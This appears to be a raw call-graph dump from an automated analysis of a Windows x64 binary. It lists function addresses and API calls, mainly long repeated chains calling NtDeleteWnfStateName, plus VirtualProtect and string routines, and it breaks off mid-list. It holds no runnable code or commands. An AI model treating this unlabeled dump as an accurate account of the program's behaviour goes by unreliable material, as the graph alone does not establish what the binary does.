2057->2058 2059 140001394 2 API calls 2058->2059 2060 1400014c7 2059->2060 2061 140001394 2 API calls 2060->2061 2062 1400014d6 2061->2062 2063 1400014e5 2062->2063 2064 140001394 2 API calls 2062->2064 2065 140001394 2 API calls 2063->2065 2064->2063 2066 1400014ef 2065->2066 2067 1400014f4 2066->2067 2068 140001394 2 API calls 2066->2068 2069 140001394 2 API calls 2067->2069 2068->2067 2070 1400014fe 2069->2070 2071 140001503 2070->2071 2072 140001394 2 API calls 2070->2072 2073 140001394 2 API calls 2071->2073 2072->2071 2074 14000150d 2073->2074 2075 140001394 2 API calls 2074->2075 2076 140001512 2075->2076 2077 140001394 2 API calls 2076->2077 2078 140001521 2077->2078 2079 140001394 2 API calls 2078->2079 2080 140001530 2079->2080 2081 140001394 2 API calls 2080->2081 2082 14000153f 2081->2082 2083 140001394 2 API calls 2082->2083 2084 14000154e 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000155d 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000156c 2087->2088 2089 140001394 2 API calls 2088->2089 2090 14000157b 2089->2090 2091 140001394 2 API calls 2090->2091 2092 14000158a 2091->2092 2093 140001394 2 API calls 2092->2093 2094 140001599 2093->2094 2095 140001394 2 API calls 2094->2095 2096 1400015a8 2095->2096 2097 140001394 2 API calls 2096->2097 2098 1400015b7 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015c6 2099->2100 2101 140001394 2 API calls 2100->2101 2102 1400015d5 2101->2102 2103 140001394 2 API calls 2102->2103 2104 1400015e4 2103->2104 2105 140001394 2 API calls 2104->2105 2106 1400015f3 2105->2106 2108 140005a40 malloc 2107->2108 2109 1400013b8 2108->2109 2110 1400013c6 NtDeleteWnfStateName 2109->2110 2110->2036 2111 140002104 2112 140002111 EnterCriticalSection 2111->2112 2117 140002218 2111->2117 2113 14000220b LeaveCriticalSection 2112->2113 2118 14000212e 2112->2118 2113->2117 2114 140002272 2115 14000214d TlsGetValue GetLastError 2115->2118 2116 140002241 DeleteCriticalSection 2116->2114 2117->2114 2117->2116 2118->2113 2118->2115 2007 140001e65 2008 140001e67 signal 2007->2008 2009 140001e7c 2008->2009 2011 140001e99 2008->2011 2010 140001e82 signal 2009->2010 2009->2011 2010->2011 2846 140001f47 2847 140001e67 signal 2846->2847 2850 140001e99 2846->2850 2848 140001e7c 2847->2848 2847->2850 2849 140001e82 signal 2848->2849 2848->2850 2849->2850 2012 14000216f 2013 140002178 InitializeCriticalSection 2012->2013 2014 140002185 2012->2014 2013->2014 2015 140001a70 2016 14000199e 2015->2016 2020 140001a7d 2015->2020 2017 140001a0f 2016->2017 2018 1400019e9 VirtualProtect 2016->2018 2018->2016 2019 140001b53 2020->2015 2020->2019 2021 140001b36 2020->2021 2022 140001ba0 4 API calls 2021->2022 2022->2019 2119 140001e10 2120 140001e2f 2119->2120 2121 140001ecc 2120->2121 2125 140001eb5 2120->2125 2126 140001e55 2120->2126 2122 140001ed3 signal 2121->2122 2121->2125 2123 140001ee4 2122->2123 2122->2125 2124 140001eea signal 2123->2124 2123->2125 2124->2125 2126->2125 2127 140001f12 signal 2126->2127 2127->2125 2851 140002050 2852 14000205e EnterCriticalSection 2851->2852 2853 1400020cf 2851->2853 2854 1400020c2 LeaveCriticalSection 2852->2854 2855 140002079 2852->2855 2854->2853 2855->2854 2856 140001fd0 2857 140001fe4 2856->2857 2858 140002033 2856->2858 2857->2858 2859 140001ffd EnterCriticalSection LeaveCriticalSection 2857->2859 2859->2858 2136 140001ab3 2137 140001a70 2136->2137 2137->2136 2138 14000199e 2137->2138 2139 140001b36 2137->2139 2142 140001b53 2137->2142 2141 140001a0f 2138->2141 2143 1400019e9 VirtualProtect 2138->2143 2140 140001ba0 4 API calls 2139->2140 2140->2142 2143->2138 1979 140001394 1983 140005a40 1979->1983 1981 1400013b8 1982 1400013c6 NtDeleteWnfStateName 1981->1982 1984 140005a5e 1983->1984 1987 140005a8b 1983->1987 1984->1981 1985 140005b33 1986 140005b4f malloc 1985->1986 1988 140005b70 1986->1988 1987->1984 1987->1985 1988->1984 2128 14000219e 2129 140002272 2128->2129 2130 1400021ab EnterCriticalSection 2128->2130 2131 140002265 LeaveCriticalSection 2130->2131 2133 1400021c8 2130->2133 2131->2129 2132 1400021e9 TlsGetValue GetLastError 2132->2133 2133->2131 2133->2132 2023 140001000 2024 14000108b __set_app_type 2023->2024 2025 140001040 2023->2025 2027 1400010b6 2024->2027 2025->2024 2026 1400010e5 2027->2026 2029 140001e00 2027->2029 2030 140005fd0 __setusermatherr 2029->2030 2031 140001800 2032 140001812 2031->2032 2033 140001835 fprintf 2032->2033 2134 140002320 strlen 2135 140002337 2134->2135 2144 140001140 2147 140001160 2144->2147 2146 140001156 2148 1400011b9 2147->2148 2149 14000118b 2147->2149 2150 1400011d3 2148->2150 2151 1400011c7 _amsg_exit 2148->2151 2149->2148 2152 1400011a0 Sleep 2149->2152 2153 140001201 _initterm 2150->2153 2154 14000121a 2150->2154 2151->2150 2152->2148 2152->2149 2153->2154 2170 140001880 2154->2170 2157 14000126a 2158 14000126f malloc 2157->2158 2159 14000128b 2158->2159 2161 1400012d0 2158->2161 2160 1400012a0 strlen malloc memcpy 2159->2160 2160->2160 2160->2161 2181 140003150 2161->2181 2163 140001315 2164 140001344 2163->2164 2165 140001324 2163->2165 2168 140001160 53 API calls 2164->2168 2166 140001338 2165->2166 2167 14000132d _cexit 2165->2167 2166->2146 2167->2166 2169 140001366 2168->2169 2169->2146 2171 1400018a2 2170->2171 2172 140001247 SetUnhandledExceptionFilter 2170->2172 2171->2172 2173 14000194d 2171->2173 2177 140001a20 2171->2177 2172->2157 2174 14000199e 2173->2174 2175 140001ba0 4 API calls 2173->2175 2174->2172 2176 1400019e9 VirtualProtect 2174->2176 2175->2173 2176->2174 2177->2174 2178 140001b53 2177->2178 2179 140001b36 2177->2179 2180 140001ba0 4 API calls 2179->2180 2180->2178 2184 140003166 2181->2184 2182 140003273 wcslen 2258 14000153f 2182->2258 2184->2182 2186 14000346e 2186->2163 2192 14000336e 2193 140003416 wcslen 2192->2193 2194 14000342c 2193->2194 2198 14000346c 2193->2198 2195 140003440 _wcsnicmp 2194->2195 2196 140003456 wcslen 2195->2196 2195->2198 2196->2195 2196->2198 2197 140003531 wcscpy wcscat 2200 140003563 2197->2200 2198->2197 2199 1400035b3 wcscpy wcscat 2202 1400035e9 2199->2202 2200->2199 2201 1400036fe wcscpy wcscat 2204 140003737 2201->2204 2202->2201 2203 140003a8d wcslen 2205 140003a9b 2203->2205 2209 140003acb 2203->2209 2204->2203 2206 140003aa0 _wcsnicmp 2205->2206 2207 140003ab6 wcslen 2206->2207 2206->2209 2207->2206 2207->2209 2208 140003bda wcscpy wcscat 2211 140003c0f 2208->2211 2209->2208 2210 140003c5f wcscpy wcscat 2213 140003c98 2210->2213 2211->2210 2212 140003cd5 wcscpy wcscat 2215 140003d1c 2212->2215 2213->2212 2214 140003d6e wcscpy wcscat wcslen 2398 14000146d 2214->2398 2215->2214 2220 140003e85 2484 1400014a9 2220->2484 2221 140003fc8 2223 14000145e 2 API calls 2221->2223 2230 140003f1c 2223->2230 2225 140003fb7 2227 14000145e 2 API calls 2225->2227 2226 1400056c7 2227->2230 2229 14000405a wcscpy wcscat wcslen 2242 140004130 2229->2242 2230->2226 2230->2229 2233 140003f10 2234 14000145e 2 API calls 2233->2234 2234->2230 2235 140004225 wcslen 2236 14000153f 2 API calls 2235->2236 2236->2242 2237 1400052ea memcpy 2237->2242 2238 14000441b wcslen 2645 14000157b 2238->2645 2239 14000468d wcslen 2241 14000153f 2 API calls 2239->2241 2241->2242 2242->2235 2242->2237 2242->2238 2242->2239 2243 140004f81 wcscpy wcscat wcslen 2242->2243 2246 140004513 wcslen 2242->2246 2249 14000457f _wcsnicmp 2242->2249 2250 1400050c3 2242->2250 2251 14000544c memcpy 2242->2251 2252 1400026e0 9 API calls 2242->2252 2253 14000516e wcslen 2242->2253 2255 140004dd5 wcscpy wcscat wcslen 2242->2255 2257 14000145e NtDeleteWnfStateName malloc 2242->2257 2600 1400014d6 2242->2600 2673 140001521 2242->2673 2771 140001431 2242->2771 2244 140001422 2 API calls 2243->2244 2244->2242 2662 1400015a8 2246->2662 2249->2242 2250->2163 2251->2242 2252->2242 2254 1400015a8 2 API calls 2253->2254 2254->2242 2702 140001422 2255->2702 2257->2242 2259 140001394 2 API calls 2258->2259 2260 14000154e 2259->2260 2261 140001394 2 API calls 2260->2261 2262 14000155d 2261->2262 2263 140001394 2 API calls 2262->2263 2264 14000156c 2263->2264 2265 140001394 2 API calls 2264->2265 2266 14000157b 2265->2266 2267 140001394 2 API calls 2266->2267 2268 14000158a 2267->2268 2269 140001394 2 API calls 2268->2269 2270 140001599 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015a8 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015b7 2273->2274 2275 140001394 2 API calls 2274->2275 2276 1400015c6 2275->2276 2277 140001394 2 API calls 2276->2277 2278 1400015d5 2277->2278 2279 140001394 2 API calls 2278->2279 2280 1400015e4 2279->2280 2281 140001394 2 API calls 2280->2281 2282 1400015f3 2281->2282 2282->2186 2283 140001503 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000150d 2284->2285 2286 140001394 2 API calls 2285->2286 2287 140001512 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001521 2288->2289 2290 140001394 2 API calls 2289->2290 2291 140001530 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000153f 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000154e 2294->2295 2296 140001394 2 API calls 2295->2296 2297 14000155d 2296->2297 2298 140001394 2 API calls 2297->2298 2299 14000156c 2298->2299 2300 140001394 2 API calls 2299->2300 2301 14000157b 2300->2301 2302 140001394 2 API calls 2301->2302 2303 14000158a 2302->2303 2304 140001394 2 API calls 2303->2304 2305 140001599 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015a8 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015b7 2308->2309 2310 140001394 2 API calls 2309->2310 2311 1400015c6 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015d5 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015e4 2314->2315 2316 140001394 2 API calls 2315->2316 2317 1400015f3 2316->2317 2317->2192 2318 14000156c 2317->2318 2319 140001394 2 API calls 2318->2319 2320 14000157b 2319->2320 2321 140001394 2 API calls 2320->2321 2322 14000158a 2321->2322 2323 140001394 2 API calls 2322->2323 2324 140001599 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015a8 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015b7 2327->2328 2329 140001394 2 API calls 2328->2329 2330 1400015c6 2329->2330 2331 140001394 2 API calls 2330->2331 2332 1400015d5 2331->2332 2333 140001394 2 API calls 2332->2333 2334 1400015e4 2333->2334 2335 140001394 2 API calls 2334->2335 2336 1400015f3 2335->2336 2336->2192 2337 14000145e 2336->2337 2338 140001394 2 API calls 2337->2338 2339 14000146d 2338->2339 2340 140001394 2 API calls 2339->2340 2341 14000147c 2340->2341 2342 140001394 2 API calls 2341->2342 2343 14000148b 2342->2343 2344 140001394 2 API calls 2343->2344 2345 14000149a 2344->2345 2346 140001394 2 API calls 2345->2346 2347 1400014a9 2346->2347 2348 140001394 2 API calls 2347->2348 2349 1400014b8 2348->2349 2350 140001394 2 API calls 2349->2350 2351 1400014c7 2350->2351 2352 140001394 2 API calls 2351->2352 2353 1400014d6 2352->2353 2354 1400014e5 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 1400014ef 2356->2357 2358 1400014f4 2357->2358 2359 140001394 2 API calls 2357->2359 2360 140001394 2 API calls 2358->2360 2359->2358 2361 1400014fe 2360->2361 2362 140001503 2361->2362 2363 140001394 2 API calls 2361->2363 2364 140001394 2 API calls 2362->2364 2363->2362 2365 14000150d 2364->2365 2366 140001394 2 API calls 2365->2366 2367 140001512 2366->2367 2368 140001394 2 API calls 2367->2368 2369 140001521 2368->2369 2370 140001394 2 API calls 2369->2370 2371 140001530 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000153f 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000154e 2374->2375 2376 140001394 2 API calls 2375->2376 2377 14000155d 2376->2377 2378 140001394 2 API calls 2377->2378 2379 14000156c 2378->2379 2380 140001394 2 API calls 2379->2380 2381 14000157b 2380->2381 2382 140001394 2 API calls 2381->2382 2383 14000158a 2382->2383 2384 140001394 2 API calls 2383->2384 2385 140001599 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015a8 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015b7 2388->2389 2390 140001394 2 API calls 2389->2390 2391 1400015c6 2390->2391 2392 140001394 2 API calls 2391->2392 2393 1400015d5 2392->2393 2394 140001394 2 API calls 2393->2394 2395 1400015e4 2394->2395 2396 140001394 2 API calls 2395->2396 2397 1400015f3 2396->2397 2397->2192 2399 140001394 2 API calls 2398->2399 2400 14000147c 2399->2400 2401 140001394 2 API calls 2400->2401 2402 14000148b 2401->2402 2403 140001394 2 API calls 2402->2403 2404 14000149a 2403->2404 2405 140001394 2 API calls 2404->2405 2406 1400014a9 2405->2406 2407 140001394 2 API calls 2406->2407 2408 1400014b8 2407->2408 2409 140001394 2 API calls 2408->2409 2410 1400014c7 2409->2410 2411 140001394 2 API calls 2410->2411 2412 1400014d6 2411->2412 2413 1400014e5 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 1400014ef 2415->2416 2417 1400014f4 2416->2417 2418 140001394 2 API calls 2416->2418 2419 140001394 2 API calls 2417->2419 2418->2417 2420 1400014fe 2419->2420 2421 140001503 2420->2421 2422 140001394 2 API calls 2420->2422 2423 140001394 2 API calls 2421->2423 2422->2421 2424 14000150d 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001512 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001521 2427->2428 2429 140001394 2 API calls 2428->2429 2430 140001530 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000153f 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000154e 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000155d 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000156c 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000157b 2439->2440 2441 140001394 2 API calls 2440->2441 2442 14000158a 2441->2442 2443 140001394 2 API calls 2442->2443 2444 140001599 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015a8 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015b7 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015c6 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015d5 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015e4 2453->2454 2455 140001394 2 API calls 2454->2455 2456 1400015f3 2455->2456 2456->2230 2457 140001530 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000153f 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000154e 2460->2461 2462 140001394 2 API calls 2461->2462 2463 14000155d 2462->2463 2464 140001394 2 API calls 2463->2464 2465 14000156c 2464->2465 2466 140001394 2 API calls 2465->2466 2467 14000157b 2466->2467 2468 140001394 2 API calls 2467->2468 2469 14000158a 2468->2469 2470 140001394 2 API calls 2469->2470 2471 140001599 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015a8 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015b7 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400015c6 2476->2477 2478 140001394 2 API calls 2477->2478 2479 1400015d5 2478->2479 2480 140001394 2 API calls 2479->2480 2481 1400015e4 2480->2481 2482 140001394 2 API calls 2481->2482 2483 1400015f3 2482->2483 2483->2220 2483->2221 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014d6 2489->2490 2491 1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2225 2535 140001440 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000144f 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000145e 2538->2539 2540 140001394 2 API calls 2539->2540 2541 14000146d 2540->2541 2542 140001394 2 API calls 2541->2542 2543 14000147c 2542->2543 2544 140001394 2 API calls 2543->2544 2545 14000148b 2544->2545 2546 140001394 2 API calls 2545->2546 2547 14000149a 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400014a9 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400014b8 2550->2551 2552 140001394 2 API calls 2551->2552 2553 1400014c7 2552->2553 2554 140001394 2 API calls 2553->2554 2555 1400014d6 2554->2555 2556 1400014e5 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 1400014ef 2558->2559 2560 1400014f4 2559->2560 2561 140001394 2 API calls 2559->2561 2562 140001394 2 API calls 2560->2562 2561->2560 2563 1400014fe 2562->2563 2564 140001503 2563->2564 2565 140001394 2 API calls 2563->2565 2566 140001394 2 API calls 2564->2566 2565->2564 2567 14000150d 2566->2567 2568 140001394 2 API calls 2567->2568 2569 140001512 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001521 2570->2571 2572 140001394 2 API calls 2571->2572 2573 140001530 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000153f 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000154e 2576->2577 2578 140001394 2 API calls 2577->2578 2579 14000155d 2578->2579 2580 140001394 2 API calls 2579->2580 2581 14000156c 2580->2581 2582 140001394 2 API calls 2581->2582 2583 14000157b 2582->2583 2584 140001394 2 API calls 2583->2584 2585 14000158a 2584->2585 2586 140001394 2 API calls 2585->2586 2587 140001599 2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015a8 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015b7 2590->2591 2592 140001394 2 API calls 2591->2592 2593 1400015c6 2592->2593 2594 140001394 2 API calls 2593->2594 2595 1400015d5 2594->2595 2596 140001394 2 API calls 2595->2596 2597 1400015e4 2596->2597 2598 140001394 2 API calls 2597->2598 2599 1400015f3 2598->2599 2599->2225 2599->2233 2601 1400014e5 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 1400014ef 2603->2604 2605 1400014f4 2604->2605 2606 140001394 2 API calls 2604->2606 2607 140001394 2 API calls 2605->2607 2606->2605 2608 1400014fe 2607->2608 2609 140001503 2608->2609 2610 140001394 2 API calls 2608->2610 2611 140001394 2 API calls 2609->2611 2610->2609 2612 14000150d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 140001512 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001521 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001530 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000153f 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000154e 2621->2622 2623 140001394 2 API calls 2622->2623 2624 14000155d 2623->2624 2625 140001394 2 API calls 2624->2625 2626 14000156c 2625->2626 2627 140001394 2 API calls 2626->2627 2628 14000157b 2627->2628 2629 140001394 2 API calls 2628->2629 2630 14000158a 2629->2630 2631 140001394 2 API calls 2630->2631 2632 140001599 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015a8 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015b7 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015c6 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015d5 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015e4 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015f3 2643->2644 2644->2242 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2242 2663 140001394 2 API calls 2662->2663 2664 1400015b7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400015c6 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400015d5 2667->2668 2669 140001394 2 API calls 2668->2669 2670 1400015e4 2669->2670 2671 140001394 2 API calls 2670->2671 2672 1400015f3 2671->2672 2672->2242 2674 140001394 2 API calls 2673->2674 2675 140001530 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000153f 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000154e 2678->2679 2680 140001394 2 API calls 2679->2680 2681 14000155d 2680->2681 2682 140001394 2 API calls 2681->2682 2683 14000156c 2682->2683 2684 140001394 2 API calls 2683->2684 2685 14000157b 2684->2685 2686 140001394 2 API calls 2685->2686 2687 14000158a 2686->2687 2688 140001394 2 API calls 2687->2688 2689 140001599 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015a8 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015b7 2692->2693 2694 140001394 2 API calls 2693->2694 2695 1400015c6 2694->2695 2696 140001394 2 API calls 2695->2696 2697 1400015d5 2696->2697 2698 140001394 2 API calls 2697->2698 2699 1400015e4 2698->2699 2700 140001394 2 API calls 2699->2700 2701 1400015f3 2700->2701 2701->2242 2703 140001394 2 API calls 2702->2703 2704 140001431 2703->2704 2705 140001394 2 API calls 2704->2705 2706 140001440 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000144f 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000145e 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000146d 2711->2712 2713 140001394 2 API calls 2712->2713 2714 14000147c 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000148b 2715->2716 2717 140001394 2 API calls 2716->2717 2718 14000149a 2717->2718 2719 140001394 2 API calls 2718->2719 2720 1400014a9 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014b8 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014c7 2723->2724 2725 140001394 2 API calls 2724->2725 2726 1400014d6 2725->2726 2727 1400014e5 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 1400014ef 2729->2730 2731 1400014f4 2730->2731 2732 140001394 2 API calls 2730->2732 2733 140001394 2 API calls 2731->2733 2732->2731 2734 1400014fe 2733->2734 2735 140001503 2734->2735 2736 140001394 2 API calls 2734->2736 2737 140001394 2 API calls 2735->2737 2736->2735 2738 14000150d 2737->2738 2739 140001394 2 API calls 2738->2739 2740 140001512 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001521 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001530 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000153f 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000154e 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000155d 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000156c 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000157b 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000158a 2755->2756 2757 140001394 2 API calls 2756->2757 2758 140001599 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015a8 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015b7 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015c6 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015d5 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015e4 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015f3 2769->2770 2770->2242 2772 140001394 2 API calls 2771->2772 2773 140001440 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000144f 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000145e 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000146d 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000147c 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000148b 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000149a 2784->2785 2786 140001394 2 API calls 2785->2786 2787 1400014a9 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014b8 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014c7 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014d6 2792->2793 2794 1400014e5 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 1400014ef 2796->2797 2798 1400014f4 2797->2798 2799 140001394 2 API calls 2797->2799 2800 140001394 2 API calls 2798->2800 2799->2798 2801 1400014fe 2800->2801 2802 140001503 2801->2802 2803 140001394 2 API calls 2801->2803 2804 140001394 2 API calls 2802->2804 2803->2802 2805 14000150d 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001512 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001521 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001530 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000153f 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000154e 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000155d 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000156c 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000157b 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000158a 2822->2823 2824 140001394 2 API calls 2823->2824 2825 140001599 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015a8 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015b7 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015c6 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015d5 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015e4 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015f3 2836->2837 2837->2242

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00000001400058E1 1 Function_00000001400057E1 2 Function_0000000140001AE4 35 Function_0000000140001D40 2->35 76 Function_0000000140001BA0 2->76 3 Function_00000001400014E5 72 Function_0000000140001394 3->72 4 Function_0000000140005CF0 29 Function_0000000140005A30 4->29 5 Function_00000001400010F0 6 Function_00000001400030F1 7 Function_00000001400014F4 7->72 8 Function_0000000140001E00 9 Function_0000000140002F00 58 Function_0000000140001370 9->58 10 Function_0000000140001000 10->8 39 Function_0000000140001750 10->39 81 Function_0000000140001FB0 10->81 88 Function_0000000140001FC0 10->88 11 Function_0000000140001800 67 Function_0000000140002290 11->67 12 Function_0000000140002500 13 Function_0000000140005801 14 Function_0000000140005701 15 Function_0000000140001503 15->72 16 Function_0000000140001404 16->72 17 Function_0000000140002104 18 Function_0000000140001E10 19 Function_0000000140003110 20 Function_0000000140005A10 21 Function_0000000140001512 21->72 22 Function_0000000140002320 23 Function_0000000140002420 24 Function_0000000140001521 24->72 25 Function_0000000140005821 26 Function_0000000140001422 26->72 27 Function_0000000140001530 27->72 28 Function_0000000140003130 30 Function_0000000140001431 30->72 31 Function_0000000140005731 32 Function_000000014000153F 32->72 33 Function_0000000140001440 33->72 34 Function_0000000140005A40 34->29 35->67 36 Function_0000000140001140 51 Function_0000000140001160 36->51 37 Function_0000000140005841 38 Function_0000000140001F47 57 Function_0000000140001870 38->57 40 Function_0000000140003150 40->9 40->15 40->24 40->26 40->27 40->29 40->30 40->32 40->33 48 Function_000000014000145E 40->48 50 Function_0000000140002660 40->50 54 Function_000000014000156C 40->54 55 Function_000000014000146D 40->55 40->58 64 Function_000000014000157B 40->64 78 Function_00000001400015A8 40->78 79 Function_00000001400014A9 40->79 87 Function_00000001400016C0 40->87 97 Function_00000001400014D6 40->97 99 Function_00000001400026E0 40->99 41 Function_0000000140001650 42 Function_0000000140002050 43 Function_0000000140005850 44 Function_0000000140003051 45 Function_0000000140005751 46 